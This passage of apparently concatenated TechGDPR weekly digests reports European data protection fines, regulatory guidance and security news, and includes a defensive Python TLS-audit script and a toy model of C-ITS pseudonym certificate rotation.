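# Anything below TLS 1.2 is obsolete; only 1.2 and 1.3 are acceptable.
OBSOLETE_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
ACCEPTABLE_PROTOCOLS = {"TLSv1.2", "TLSv1.3"}

# Substrings of OpenSSL-style suite names that mark a suite as non-compliant:
# no encryption, export grade, broken ciphers (RC4, (3)DES), MD5 integrity,
# or anonymous key exchange (no server authentication at all).
WEAK_SUITE_MARKERS = ("NULL", "EXPORT", "RC4", "DES", "MD5", "ADH", "AECDH")

AUDIT_DATE = date(2022, 7, 11)  # constructed date of the audit run


@dataclass
class ScanRecord:
    host: str
    http_redirects_to_https: bool   # does port 80 redirect to HTTPS?
    protocols: List[str]            # protocol versions the server accepts
    cipher_suites: List[str]        # TLS 1.2 suites offered (OpenSSL names)
    cert_not_after: date            # certificate expiry
    cert_hostname_match: bool
    cert_self_signed: bool = False
    hsts: bool = False


@dataclass
class Finding:
    host: str
    category: str   # unsecured_access | obsolete_protocol | non_compliant_crypto | certificate
    severity: str   # "high" or "medium"
    detail: str


def suite_is_weak(suite: str) -> bool:
    """True if the suite name carries any non-compliant marker."""
    return any(marker in suite.upper() for marker in WEAK_SUITE_MARKERS)


def suite_has_forward_secrecy(suite: str) -> bool:
    """TLS 1.2 suites give forward secrecy only with an ephemeral DH exchange."""
    return "DHE" in suite.upper()


def assess(record: ScanRecord, today: date) -> List[Finding]:
    """Return the findings for one host; an empty list means no issue found."""
    findings: List[Finding] = []

    def add(category: str, severity: str, detail: str) -> None:
        findings.append(Finding(record.host, category, severity, detail))

    # 1. Clear-text access: port 80 must redirect to HTTPS, ideally with HSTS.
    if not record.http_redirects_to_https:
        add("unsecured_access", "high", "HTTP served without redirect to HTTPS")
    elif not record.hsts:
        add("unsecured_access", "medium", "HTTPS available but no HSTS header")

    # 2. Protocol versions: every obsolete version accepted is a finding.
    for proto in record.protocols:
        if proto in OBSOLETE_PROTOCOLS:
            add("obsolete_protocol", "high", f"server accepts {proto}")
    if not any(p in ACCEPTABLE_PROTOCOLS for p in record.protocols):
        add("obsolete_protocol", "high", "no modern TLS version (1.2/1.3) offered")

    # 3. Cipher suites: weak suites are non-compliant; no forward secrecy is a warning.
    for suite in record.cipher_suites:
        if suite_is_weak(suite):
            add("non_compliant_crypto", "high", f"weak cipher suite {suite}")
        elif not suite_has_forward_secrecy(suite):
            add("non_compliant_crypto", "medium", f"no forward secrecy: {suite}")

    # 4. Certificate: must be unexpired, match the host name and not be self-signed.
    if record.cert_not_after < today:
        add("certificate", "high", f"certificate expired on {record.cert_not_after}")
    if not record.cert_hostname_match:
        add("certificate", "high", "certificate does not match host name")
    if record.cert_self_signed:
        add("certificate", "high", "self-signed certificate")
    return findings


def summarise(records: List[ScanRecord], today: date) -> Dict[str, List[str]]:
    """Map each host to the sorted list of flaw categories it exhibits."""
    return {r.host: sorted({x.category for x in assess(r, today)}) for r in records}


# Constructed sample: one well-configured host and one showing every flaw class.
SAMPLE_RECORDS = [
    ScanRecord("good.example", True, ["TLSv1.2", "TLSv1.3"],
               ["ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-ECDSA-CHACHA20-POLY1305"],
               date(2026, 1, 1), True, hsts=True),
    ScanRecord("legacy.example", False, ["TLSv1.0", "TLSv1.1", "TLSv1.2"],
               ["AES128-SHA", "DES-CBC3-SHA", "ECDHE-RSA-AES256-GCM-SHA384"],
               date(2021, 3, 1), True, cert_self_signed=True),
]


def sample_findings() -> Dict[str, List[Finding]]:
    """Findings for the constructed sample, keyed by host."""
    return {r.host: assess(r, AUDIT_DATE) for r in SAMPLE_RECORDS}


if __name__ == "__main__":
    for host, items in sample_findings().items():
        for x in items:
            print(f"{host}: [{x.severity}] {x.category}: {x.detail}")
```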

The Finnish company Otavamedia was penalised for shortcomings in the implementation of data protection rights. Between 2018 and 2021, eleven cases concerning Otavamedia were brought to the office of the data protection commissioner. Among other things, the complainants had not received an answer to their requests or inquiries regarding data protection rights. According to the report provided by Otavamedia, some of the data protection requests had not been implemented due to a technical problem with e-mail handling in connection with a change of digital service providers. During the error situation, the messages that arrived in the e-mail box reserved for data protection matters were not forwarded to the customer service staff. The situation was discovered only after the data protection authority’s request for clarification.

Otavamedia should have taken care to test the e-mail box, as it is the main electronic contact channel for data subjects in data protection matters. Additionally, data subjects had the opportunity to make requests to Otavamedia regarding their own information using a printable form. The person’s signature was required on the form for identification purposes. The regulator considers that with this method of operation, Otavamedia collected an unnecessarily large amount of data for identification purposes. Otavamedia does not process signature information in other contexts, which is why it was not possible, for example, to compare signatures with previously held information.

In the first half of 2022, the Czech office for personal data protection UOOU monitored compliance with the GDPR in connection with how various operators of web portals and pages configured the processing of cookie files, based on both complaints received and the monitoring plan. Among the main shortcomings detected by the regulator are:

  • Use of non-technical cookies without consent.
  • A disproportionately long period of validity of cookies in relation to their purpose.
  • Absence of an option to refuse non-technical cookies in the first layer of the cookie bar.
  • Wrong categorisation of cookies.
  • Absence of information about specific cookies used.
  • Consent and refusal buttons for non-technical cookies given different visual prominence.
  • Information about cookies in a foreign language.
  • The cookie bar making the website difficult or impossible to read.

The Polish supervisory authority UODO was notified of potential irregularities related to the processing of personal data by a manufacturing company, (Esselmann Technika Pojazdowa). The company made an informed decision not to notify the supervisory authority of a breach involving an important document of one of its employees, despite the letters addressed to it indicating a possible risk to the rights or freedoms of the persons concerned in this case. In the course of explanatory actions by the regulator, the loss of a document from the personal file of a company employee – an employment certificate – was revealed. The certificate of employment contains a lot of important information about the person, including:

  • the period(s) of employment;
  • the procedure and legal basis for the termination or expiry of the employment relationship;
  • parental and child care leave taken;
  • information on the amount of remuneration and qualifications obtained – at the employee’s request;
  • information on enforcement seizure of remuneration.

Taking the above into account, the Polish regulator imposed a fine of approx. 3,500 euros.

The Irish data protection authority DPC published its recent decision concerning Twitter International Company. In 2019, the complainant alleged that, following the suspension of their Twitter account, Twitter failed to comply with an erasure request they had submitted to it within the statutory timeframe. Further, the complainant alleged that Twitter had requested a copy of their photographic ID in order to action their request without a legal basis to do so. Finally, the complainant alleged that Twitter had retained their personal data following their erasure request without a legal basis to do so.

While the complaint was lodged directly with the DPC by an individual who resides in the UK, the DPC considered that the nature of the data processing operations complained of could have a substantial effect, and that the type of processing meets the definition of cross border processing. As a result, the DPC ordered Twitter, pursuant to Article 58 of the GDPR, to revise its internal policies and procedures for handling erasure requests to ensure that data subjects are no longer required to provide a copy of photographic ID when making data erasure requests, unless it can demonstrate a legal basis for doing so. 

Data relating to health enjoys enhanced protection and, subject to the exceptions provided for by the law, dissemination is prohibited. Administrative transparency cannot violate people’s privacy. For these reasons, the Italian privacy regulator ‘Garante’ sanctioned the Roma local health authority 46,000 euros. It had published in clear text on its website all the names and data relating to the health of the subjects who had requested civic access in 2017 and 2018. In most cases, the documents concerned the health records of the persons concerned, including medical records, disability assessments, tests, technical reports, etc. The first serious violation detected by the Authority, which took action ex officio, was therefore the dissemination of data on the health of the subjects concerned, information relating to both their physical and mental state, including the provision of health care services.

Data security: cybersecurity threat landscape

The European Union Agency for Cybersecurity provided simple steps to map the cybersecurity threat landscape, (CTL). The methodology aims at promoting consistent and transparent threat intelligence sharing across the EU, (including but not limited to public bodies, policy makers, cybersecurity experts, industry, vendors, solution providers, SMEs). The framework is based on the different elements considered in the performance of the cybersecurity threat landscape analysis. It therefore includes the identification and definition of the process, the methods and tools used as well as the stakeholders involved. Building on the existing modus operandi, this methodology provides directions on the following:

  • defining components and contents of each of the different types of CTL;
  • assessing the target audience for each type of CTL to be performed;
  • how data sources are collected;
  • how data is analysed;
  • how data is to be disseminated;
  • how feedback is to be collected and analysed.

The methodology consists of six main steps, each with an associated feedback loop: direction, collection, processing, analysis and production, dissemination, and feedback. You can download the full methodology guide here.

Big Tech: Apple’s new lockdown mode, Chinese CCTV in UK

Apple’s latest iOS 16 security tool can defend against a state-sponsored cyberattack on your iPhone, cnet.com reports. In short, new Lockdown Mode increases security capabilities on iOS 16, iPadOS 16, and macOS Ventura by limiting certain functions that may be vulnerable to attack: 

  • Messages: Most message attachment types other than images are blocked. Some features, like link previews, are disabled.
  • Web browsing: Certain complex web technologies, like just-in-time (JIT) JavaScript compilation, are disabled unless the user excludes a trusted site from Lockdown Mode.
  • Apple services: Incoming invitations and service requests, including FaceTime calls, are blocked if the user has not previously sent the initiator a call or request.
  • Wired connections with a computer or accessory are blocked when iPhone is locked.
  • Configuration profiles cannot be installed, and the device cannot enrol into mobile device management, (MDM), while Lockdown Mode is turned on.

Meanwhile, a cross-party group of UK MPs has called for a ban on two Chinese surveillance camera brands widely used in Britain, according to Yahoo News. The AI-enabled cameras are capable of facial detection, gender recognition and behavioural analysis and offer advanced features such as identifying fights or whether someone is wearing a face mask. The two brands, Hikvision and Dahua, are widely used by government bodies in the UK, by 73% of councils across the UK, 57% of secondary schools in England, and six out of 10 NHS Trusts. Reportedly, Hikvision and Dahua are now banned from trading in the US over security concerns and evidence of their widespread use in so-called “re-education” camps in China. The MPs’ call for action also includes “an independent national review of the scale, capabilities, ethics and rights impact of modern CCTV in the UK”.

Weekly digest January 17 – 23, 2022: EU Digital strategy, smart transport and cities, AI taxonomy, Bluetooth security
https://techgdpr.com/blog/weekly-digest-24012022-eu-digital-strategy-smart-transport-and-cities-ai-taxonomy-bluetooth-security/
Mon, 24 Jan 2022 09:49:06 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Legal processes: EU Digital Strategy, IoT, biometrics policing program, US surveillance ads

The EU Parliament moved on the implementation of the Digital Services Act, (part of the EU Digital Strategy), that regulates platforms for a safer online space for users. MEPs gave the green light to open negotiations with member states. The Parliament introduced several changes to the Commission’s proposal, among them exempting micro and small enterprises from certain obligations, and including the following:

  • Targeted advertising: more transparent and informed choice for the recipients of digital services, including information on how their data will be monetised. 
  • Refusing consent shall be no more difficult or time-consuming than giving consent. 
  • If their consent is refused or withdrawn, recipients shall be given other options to access the online platform, including “options based on tracking-free advertising”.
  • Targeting or amplification techniques involving the data of minors or special categories of data for the purpose of displaying ads will be prohibited.
  • Recipients of digital services and organisations representing them must be able to seek redress for damages.
  • Platforms should be prohibited from using deceptive or nudging techniques on users.
  • Very Large Online Platforms should provide at least one recommender system that is not based on profiling. 

The EU Commission published its latest competition sector inquiry report into the consumer Internet of Things, (IoT). Among the main areas of potential concern are:

  • The role of voice assistants and smart devices as intermediaries for data generation and collection, which would allow them to control user relationships. 
  • The extensive access to data, including information on user interactions with third-party smart devices and consumer IoT services by providers of voice assistants. 
  • Access to and accumulation of large amounts of data, which allows voice assistant providers to improve their market position.

The IoT inquiry urges companies to review their commercial practices, as its findings will inevitably add to the ongoing legislative process on the EU Digital Markets Act, (part of the EU Digital Strategy). Read the report and the staff working document for more detailed information.

According to Human Rights Watch, Greece’s new biometrics policing program can undermine privacy and create risks of profiling and other abuses. The police reportedly would use hand-held devices to gather biometric information, (fingerprints, faces), from people on a vast scale and cross-check it against police, immigration, and private sector databases, primarily for immigration purposes. Human Rights Watch believes that a) the Greek police should use their authority to stop people and require them to show identity documents only when based on a reasonable suspicion that the person is involved in an illegal activity, and b) the police should put in place systems to check the validity of identity documents without detaining people or gathering personal biometric data. In 2019 the Greek police signed a contract with Intracom Telecom to help create the “smart policing” program. Since 2020, the Hellenic Data Protection Authority (DPA) has been investigating its lawfulness. The launch of the program was planned for 2021, but has been delayed a couple of times.

The Banning Surveillance Advertising Act was introduced in the US House of Representatives. The draft legislation prohibits advertising networks and facilitators from using personal data to target ads, with the exception of broad location targeting to a recognised place (such as a municipality). The bill also prohibits advertisers from targeting ads based on protected-class information, such as race, gender and religion, or on personal data purchased from data brokers. However, it makes explicit that contextual advertising, which is advertising based on the content a user is engaging with, remains allowable. It also authorises the FTC and the state attorneys general to enforce violations of the Act. Read the full draft law here and detailed section-by-section summaries here.

Official guidance: Bluetooth security, clinical trials Code of Conduct, the right to access, housing, processor/EU representative

The US National Institute of Standards and Technology (NIST) published its updated guide on Bluetooth security. Bluetooth wireless technology is used primarily to establish wireless personal area networks and has been integrated into many types of business and consumer devices. The Bluetooth specifications define several security modes; each version of Bluetooth supports some but not all of them, and some modes require no security at all. The updated NIST guide provides exhaustive information on the security capabilities of Bluetooth and gives step-by-step management, technical and operational recommendations to organisations employing Bluetooth wireless technologies on securing them effectively.

The European Federation of Pharmaceutical Industries and Associations, EFPIA, confirmed that its GDPR Code of Conduct on Clinical Trials and Pharmacovigilance has progressed to the final phase of review by data protection authorities prior to formal submission to the EDPB for approval. The EFPIA believes that a GDPR Code of conduct will:

  • Enable the sector to align on key data protection positions, providing more consistency, clarity and certainty for clinical research. 
  • Bring more certainty to third parties (patients, ethical committees and hospitals). 
  • Clarify the linkages between the GDPR and other key sectoral legislation such as the Clinical Trials Regulation.
  • Respond to the Commission’s policy ambition for the European Health Data Space to improve data governance, etc.

The EDPB adopted guidelines on the right of access that enables individuals to get knowledge on how and why their personal data is processed by organisations. Among others, the guide provides clarifications on the scope of the right of access, the information the controller has to provide to the data subject, the format of the access request, the main modalities for providing access, and the notion of manifestly unfounded or excessive requests. The Guidelines will be subject to public consultation for a period of 6 weeks and made available on the EDPB website once these have been completed.

The Bavarian data protection authority for the private sector (BayLDA) is examining the area of housing management and, in particular, self-disclosure by prospective tenants, DataGuidance reports. The BayLDA clarified that when contact is first made and a viewing appointment arranged, information about the prospective tenant’s occupation and income is not yet required. Only if the person remains interested after viewing the flat is it permissible to ask about the number of people moving in and the prospective tenant’s occupation and income. If at the end of the selection process the landlord wishes to conclude a tenancy agreement with the person, a self-disclosure from a credit agency may also be requested before the agreement is concluded.

The Croatian data protection authority AZOP analysed whether a processor can also act as a controller’s EU representative. To ensure that a processor in that scenario is not caught between the two duties, the regulator says, it would be advisable to establish processes and practices in the work environment that promote effective control, management and resolution of conflicts of interest (eg, open communication and dialogue on ethics, and training of employees). At the same time, such procedures and close control of the processor, within the representative’s remit, could in practice prove unenforceable and counterproductive, resulting in distrust of the controller. The regulator therefore concludes that performing both functions in the same person would represent a possible conflict of interest and should be prevented.

Data breaches, Investigations and Enforcement actions: aggressive telemarketing, Red Cross, demonstrators, IT solutions’ failed security

The Italian data protection authority, “Garante”, fined Enel Energia (a multinational manufacturer and distributor of electricity and gas) 26.5 mln euros for aggressive telemarketing, use of consumer data without consent and failure to comply with the accountability principle. The decision was issued following hundreds of complaints by users who had received unsolicited calls, some of them based on pre-recorded messages. Others had found it difficult to exercise their data protection rights and had encountered problems handling their data in connection with the supply of utility services, both on the company’s website and through the app released to manage power consumption. Enel Energia was ordered to bring all processing by its sales network into compliance with suitable arrangements, to implement further technical and organisational measures to handle data subjects’ requests, in particular the right to object to processing for promotional purposes, and to respond to those requests within 30 days.

A massive cyber-attack targeted Red Cross Red Crescent data on 500,000 people, held in files at an external company in Switzerland that the ICRC contracts to store data. There is not yet any indication that the compromised information has been leaked or shared publicly. The attack compromised confidential information on highly vulnerable people, including those separated from their families due to conflict, migration and disaster, missing persons and their families, and people in detention. In response the ICRC had to shut down its Restoring Family Links systems. The organisation asks those responsible for the attack not to share, sell, leak or otherwise use this data.

The Portuguese data regulator CNPD fined the Lisbon city municipality 1.25 mln euros in a case related to the processing of personal data of participants in demonstrations. The mayor’s office had committed 225 breaches of demonstrators’ personal data between 2018 and 2021, namely when their details were shared with the embassies of several countries, the BBC reports. More than 100 other breaches that occurred since 2012 were not covered as they pre-dated the GDPR. Some of the breaches reportedly could have attracted fines of up to 20 mln euros each, but the regulator refrained from imposing these due to the effect of the pandemic on public finances. When the story broke in June 2021, the data protection officer and the cabinet in charge of handling protesters’ data were dismissed, and an external audit of the city hall’s data protection policies was ordered, Reuters reports.

The Maltese data protection authority, IDPC, issued its decision on the personal data breach suffered by C-Planet (IT Solutions). In 2020 the regulator was informed of a security incident encountered by the company. The investigation concluded that C-Planet, in its capacity as controller, was processing the personal data and special categories of data impacted by the breach in violation of articles 5, 6, 9 and 14 of the GDPR. C-Planet failed to implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk. Additionally, the controller failed to notify the breach to the regulator within the deadline and to communicate it to the affected data subjects. The IDPC imposed a proportionate fine of 65,000 euros on the microenterprise, taking into account its turnover, and ordered the erasure of the personal data that had been processed unlawfully.

Data security: C-ITS, Smart Cities, Remote identity proofing

The German Federal Office for Information Security (BSI) published its Technical Guidance on Cooperative Intelligent Transport Systems (C-ITS), available in English. Among many provisions it describes trust and privacy management concerning the establishment and maintenance of identities and cryptographic keys. Because links between a vehicle and its user can be deduced either directly or indirectly, the impact on road users’ privacy should be minimised through:

  • Pseudonymity: a C-ITS station may use a resource or service without disclosing its identity but can still be accountable for that use. 
  • Unlinkability: Unlinkability denotes that a C-ITS station may make multiple uses of resources or services without others being able to link them together. 

Classically, authenticity and integrity are ensured by a security architecture backed by a Public Key Infrastructure. In C-ITS, pseudonymity and unlinkability are incorporated and balanced against integrity and authenticity by means of separation of duties and regularly changing pseudonym certificates, so-called Authorization Tickets. Read the full C-ITS guide here.
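To make the separation of duties concrete, here is an added toy model in Python; it is not code from the BSI guide or from any C-ITS implementation. An enrolment authority knows the long-term identity, an authorization authority issues tickets against an enrolment credential without learning that identity, and a station switches tickets between beacons so that an eavesdropper cannot chain them together. HMAC under a per-ticket key stands in for the ECDSA signature and certificate chain a real Authorization Ticket carries; the class names, the identifier "VEH-1" and the rotation parameters are invented for the illustration.

```python
import hashlib
import hmac
import secrets
from collections import defaultdict

# Added toy model of C-ITS pseudonym handling; not code from the BSI guide.
# HMAC under a per-ticket key stands in for the ECDSA signature a real
# Authorization Ticket (AT) would carry; the lifecycle is what is shown.


class EnrolmentAuthority:
    """Knows long-term vehicle identity <-> enrolment credential (EC)."""

    def __init__(self):
        self._ec_to_identity = {}

    def enrol(self, long_term_id):
        ec = secrets.token_hex(8)
        self._ec_to_identity[ec] = long_term_id
        return ec

    def resolve(self, ec):
        return self._ec_to_identity[ec]


class AuthorizationAuthority:
    """Issues ATs and records AT <-> EC only; it never learns the identity."""

    def __init__(self):
        self._at_to_ec = {}
        self._at_keys = {}  # registry standing in for the AT's signed public key

    def issue_tickets(self, ec, count):
        tickets = []
        for _ in range(count):
            at_id, key = secrets.token_hex(8), secrets.token_bytes(32)
            self._at_to_ec[at_id] = ec
            self._at_keys[at_id] = key
            tickets.append((at_id, key))
        return tickets

    def verify(self, at_id, payload, signature):
        key = self._at_keys.get(at_id)
        if key is None:
            return False  # unknown or revoked pseudonym
        expected = hmac.new(key, payload, hashlib.sha256).digest()
        return hmac.compare_digest(expected, signature)

    def resolve(self, at_id):
        return self._at_to_ec[at_id]


class Station:
    """A vehicle's ITS station signing beacons and rotating its AT."""

    def __init__(self, tickets, rotate_every):
        self._tickets = list(tickets)
        self._rotate_every = rotate_every
        self._sent = 0

    def beacon(self, position):
        # pick the ticket that belongs to the current rotation window
        idx = (self._sent // self._rotate_every) % len(self._tickets)
        at_id, key = self._tickets[idx]
        self._sent += 1
        payload = f"{self._sent},{position[0]},{position[1]}".encode()
        signature = hmac.new(key, payload, hashlib.sha256).digest()
        return (at_id, payload, signature)


def max_linkable(messages):
    """Largest number of beacons an eavesdropper can tie to one pseudonym."""
    seen = defaultdict(int)
    for at_id, _, _ in messages:
        seen[at_id] += 1
    return max(seen.values())


def drive(rotate_every, n_messages=12, n_tickets=12):
    """Enrol one vehicle, issue its ticket pool, send n beacons, verify them all."""
    ea, aa = EnrolmentAuthority(), AuthorizationAuthority()
    ec = ea.enrol("VEH-1")  # invented identifier
    station = Station(aa.issue_tickets(ec, n_tickets), rotate_every)
    messages = [station.beacon((i, 2 * i)) for i in range(n_messages)]
    all_valid = all(aa.verify(*m) for m in messages)
    return ea, aa, messages, all_valid


def resolve_misbehaviour(ea, aa, at_id):
    """Accountability needs both authorities: AA maps AT->EC, EA maps EC->identity."""
    return ea.resolve(aa.resolve(at_id))


if __name__ == "__main__":
    for rot in (12, 1):
        ea, aa, msgs, ok = drive(rot)
        print(f"rotate every {rot:2d}: valid={ok}, linkable={max_linkable(msgs)}, "
              f"resolves to {resolve_misbehaviour(ea, aa, msgs[0][0])}")
```

Compare the two printed lines: with one ticket for the whole drive an eavesdropper ties all twelve beacons to a single pseudonym, while with a fresh ticket per beacon no two can be linked, yet every message still verifies and a misbehaving ticket can still be traced to the vehicle, but only when both authorities cooperate. Ticket pool size, rotation interval and what each authority may record are the parameters such a deployment has to balance.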

The German Federal Office for Information Security also published its recommendations for action on information security in Smart Cities and Smart Regions (in German). Smart cities and regions use the potential of digitisation for municipal services of general interest, such as local public transport or waste disposal. Information security, especially of the underlying municipal IoT infrastructures, is of crucial importance. The target group is municipal decision-makers and those responsible for operations, such as a municipality’s chief digital officer or the manager of a municipal IoT project. The recommendations are structured along the lifecycle of an IoT infrastructure. You can see the full guide here.

Meanwhile the EU Agency for Cybersecurity, ENISA, published an explainer on remote identity proofing. Online users expect access to various services anytime and anywhere, so the need to securely onboard and prove a customer’s identity remotely is becoming critical for organisations. Identity and technology providers have implemented both active and passive security controls, which mostly involve the use of video and operator intervention (eg, biometric acquisition, liveness checks, ID acquisition, authenticity checks, face comparison). Video allows a greater number of security checks, and operators help the artificial intelligence to identify new types of attack. Although many have faith in facial recognition technology, algorithms cannot understand and detect new fraud techniques (eg, deepfakes) on their own. Therefore, humans are needed to clean and tag data, enabling quality training that results in better performance and the mitigation of adversarial attacks.

Audits: Emailmovers Ltd

Following a test data purchase initiative run by the UK Information Commissioner’s Office (ICO), Emailmovers Ltd (EML) was investigated after serious concerns were identified about its data protection compliance. The investigation resulted in an enforcement notice, followed by a consensual audit of the company’s systems; the checks took one week. The audit focused on the processing of personal data within EML’s marketing database and covered the following key control areas: governance, sourcing personal data, transparency and lawful basis for processing, data supply and sharing, and individual rights. The ICO identified both good practices (a proactive approach, training, managerial involvement in decision making) and areas for improvement (defining retention periods, maintaining a record of processing activities and of decisions taken, and notifying recipients of personal data of the exercise and outcome of individual rights), which can be read in the audit documentation.

AI: taxonomy and business models

The European Institute of Innovation and Technology published two reports on Artificial Intelligence business models and taxonomy in Europe. Both reports give in-depth recommendations on how to streamline knowledge, experience and expertise in AI deployment, and on how to connect, share and encourage an open innovation environment with policy leaders, industrial experts and innovator communities (AI application providers, infrastructure providers and adopters). The trust ecosystem for ethical AI includes, but is not limited to, the following dimensions:

  • human agency and oversight;
  • technical robustness and safety (including resilience to attack and security, fallback plan and general safety, accuracy, reliability and reproducibility); 
  • privacy and data governance (including respect for privacy, quality and integrity of data, and access to data); 
  • transparency (including traceability, explainability and communication); 
  • diversity, non-discrimination and fairness (including the avoidance of unfair bias, accessibility and universal design, and stakeholder participation), and more.

Big Tech: Apple AirTags, Google’s age-appropriate policy

Police across the US are reporting cases where stalkers have used Apple AirTags to track their victims, according to the Guardian. Paired with the Find My app, the coin-sized attachable gadget was designed so you would never lose anything again, but slipped into a bag or coat pocket it is the perfect tracking device for criminals. Other international police forces have also reported similar abuse of the AirTag, including in car theft. While the AirTag’s several anti-abuse features make it less dangerous than other available stalkerware, an additional problem is the inconsistency of police response. A 2021 Norton report claims stalkerware is growing fast, having jumped in 2020 and the first half of 2021.

Google has fallen foul of the UK’s Children’s Code, introduced last September, which sets 15 privacy and design standards for online services to protect minors. Google said it would immediately improve enforcement of its age-sensitive ad policy after Reuters reported that age-sensitive advertising for high-risk financial instruments, adult toys and alcohol was evading Google’s filters and safeguards. The campaign group 5Rights Foundation, which reviewed the Reuters findings, says all tech companies should do more to ensure compliance with the new rules, and consumers should beware of “safety washing”, as there were still too many cases indicating that companies had yet to get serious about implementing changes.

The post Weekly digest January 17 – 23, 2022: EU Digital strategy, smart transport and cities, AI taxonomy, Bluetooth security appeared first on TechGDPR.

Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories
https://techgdpr.com/blog/weekly-digest-20122021-grindr-privacy-fine-guide-for-sme-and-developers-biometrics-5g-smart-factories/ Mon, 20 Dec 2021 11:06:05 +0000

TechGDPR’s review of international data-related stories from press and analytical reports.

Grindr’s privacy fine in focus

Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, a privacy fine of over 6 mln euros for disclosing user data to third parties for behavioural advertising without a legal basis. The offences were committed before April 2020, when its terms of use and consent management platform (CMP) were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender and use of the app. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the app and advertising vendors. At the same time, Grindr failed to comply with most of the requirements for freely given, specific, informed and unambiguous consent, and its withdrawal, for such data sharing:

  • users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
  • the consents for sharing data with its advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically if they wanted to allow their data to be shared with third parties ads);
  • the information about the sharing was not properly communicated to users;
  • refusing consent was dependent on the user’s patience and technological understanding, and it did not demonstrate a fair, intuitive and genuine free choice.

Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy could upgrade to the paid version. However, the regulator pointed out that at the time of registration users were not given the choice to opt for the paid version of the app. The user would first have to go through the consent mechanism described above; only after this process could the user decide to upgrade to the paid version. 

Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR, (Data protection by Design and by Default). Participants in the ad tech ecosystem would likely only receive a “blinded” app-ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.” 

The Norwegian regulator, however, stated that even if the app-ID was in some instances “blinded”, the recipient could still receive keywords relating to the Grindr app. As an example, OpenX, which Grindr considers to be its processor, appended the keywords “gay”, “bi” and “bi-curious” to ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and would also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read the 70-page fine notice in the Grindr case (available in English) for more facts and the relevant GDPR provisions explained.

Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data

In Finland, a psychotherapy centre was fined for failing to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020 after finding a blackmail message: the patient database had been uploaded to the attacker’s servers and a ransom was demanded. A sample of the patient database was attached to the threat. It later became clear that the intrusion had probably already taken place in 2018, and that another followed in 2019, owing to the poor protection of the patient information system. The data protection impact assessment carried out by the respondent also did not meet the requirements of Art. 35(7) of the GDPR. Finally, the company had no documented notification procedure in place at the time of the breaches.

French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly-available images worldwide, to stop illegal use of biometric data from people in France and delete it within two months. The UK Information Commissioner’s Office, which worked with the Australians on the Clearview investigation, also said last month it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.

California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC. 

Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act 

The EDPB published its contribution to the EU Commission’s evaluation of the Law Enforcement Directive (LED), a piece of EU legislation parallel to the GDPR which also came into effect in 2018. The LED aims to support cooperation between police authorities through the exchange of personal data. Previously, EU legal instruments in this area were limited to data protection rules for EU agencies, large-scale IT systems established under EU law, or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. New legislative and technological developments in the processing of data for law enforcement purposes have, however, increased the workload of EDPB members. Data protection authorities may also often have to balance their resources between supervision of the GDPR and the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.

The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviour. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional provisions, namely:

  • requirements on the use of data for targeted or micro-targeted advertising and on the interoperability of services (eg, number-independent interpersonal communication services, social network services);
  • an option for users to uninstall pre-installed software applications, such as apps, on a core platform service at any stage. 

The approved text will be Parliament’s mandate for negotiations with EU governments, planned to start in the first semester of 2022. The Digital Services Act (DSA), a parallel proposal to regulate online platforms dealing with, among other issues, profiling algorithms and deceptive or nudging techniques that influence users’ behaviour through “dark patterns”, is due to be put to the vote in plenary in January. Read also the latest analysis by Baker McKenzie of the DSA’s possible effect on EU residents’ fundamental rights and freedoms.

Meanwhile, Australia and the US signed a Cloud Act deal to help law enforcement agencies demand data from tech giants, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain information. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian reports.

Official guidance: SMEs, developers, biometrics, cookies

The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online trackers and to audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities that have led to data breaches notified to the CNIL, and presents examples of measures that would have made it possible to avoid them. In total, the guide now includes 18 thematic sheets covering most developers’ needs at each stage of their project, from identifying and minimising the personal data collected to preparing for the exercise of data subject rights, managing retention periods and technically implementing legal bases.

